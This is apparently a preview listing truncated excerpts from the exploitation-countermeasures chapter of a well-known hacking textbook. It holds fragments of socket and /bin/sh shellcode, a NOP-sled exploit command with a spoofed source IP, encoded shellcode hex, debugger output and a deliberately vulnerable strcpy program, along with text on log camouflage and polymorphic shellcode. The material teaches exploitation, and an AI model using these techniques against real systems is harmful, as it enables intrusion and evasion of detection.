Hacking - The Art of Exploitation, 2nd Edition
Countermeasures 347 push edx ; Build arg array: { protocol = 0, push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1, push BYTE 0x2 ; AF ...
348 0x600 0x660 Advanced Camouflage Our current stealth exploit only camouflages the web request; however, the IP address and ti ...
Countermeasures 349 This program can be used to inject a sockaddr_in structure. The output below shows the program being compile ...
350 0x600 (perl -e "print \"$FAKEREQUEST\""; ./addr_struct "$SPOOFIP" "$SPOOFPORT"; perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE"; ...
Countermeasures 351 Then, from another terminal, the new spoofing exploit is used to advance execution in the debugger. reader@h ...
352 0x600 sinzero = "\000\000\000\000 (gdb) x/s log_buffer 0xbffff1c0: "From 12.34.56.78:9090 \"GET / HTTP/1.1\"\t" (gdb) At the ...
Countermeasures 353 strace is used with the -p command-line argument to attach to a running process. The -e trace=write argument ...
354 0x600 (perl -e "print \"$FAKEREQUEST\""; ./addr_struct "$SPOOFIP" "$SPOOFPORT"; perl -e "print \"\x90\"x$ALIGNED_SLED_SIZE"; ...
Countermeasures 355 big red flag. We could change the port to something that looks less suspicious; however, simply having a web ...
356 0x600 warning: not using untrusted file "/home/reader/.gdbinit" Using host libthread_db library "/lib/tls/i686/cmov/libthrea ...
Countermeasures 357 of new_sockfd will still be correct since the offset from ESP will be the same. As you may remember from deb ...
358 0x600 To effectively use this shellcode, we need another exploitation tool that lets us send the exploit buffer but keeps th ...
Countermeasures 359 00000020 b0 3f cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 |.?.Iy..Rh//shh| 00000030 2f 62 69 6e 89 e3 52 89 e ...
360 0x600 The following shellcode pushes these encoded bytes to the stack and then decodes them in a loop. Also, two int3 instru ...
Countermeasures 361 push ebx ; push string addr to stack above null terminator. mov ecx, esp ; This is the argv array with strin ...
362 0x600 0xbffff738: 52 '4' 103 'g' 110 'n' 115 's' 52 '4' 120 'x' 109 'm' 5 '\005' (gdb) cont Continuing. [tcsetpgrp failed in ...
Countermeasures 363 Since we zero out these registers before we use them, we can safely use a random combination of these bytes ...
364 0x600 strncpy(description, desc, MAX_DESC_LEN); strcpy(product_code, id); printf("Updating product #%s with description \'%s ...
Countermeasures 365 reader@hacking:~/booksrc $ gcc -o update_info update_info.c reader@hacking:~/booksrc $ sudo chown root ./upd ...
366 0x600 0x691 Polymorphic Printable ASCII Shellcode Polymorphic shellcode refers to ...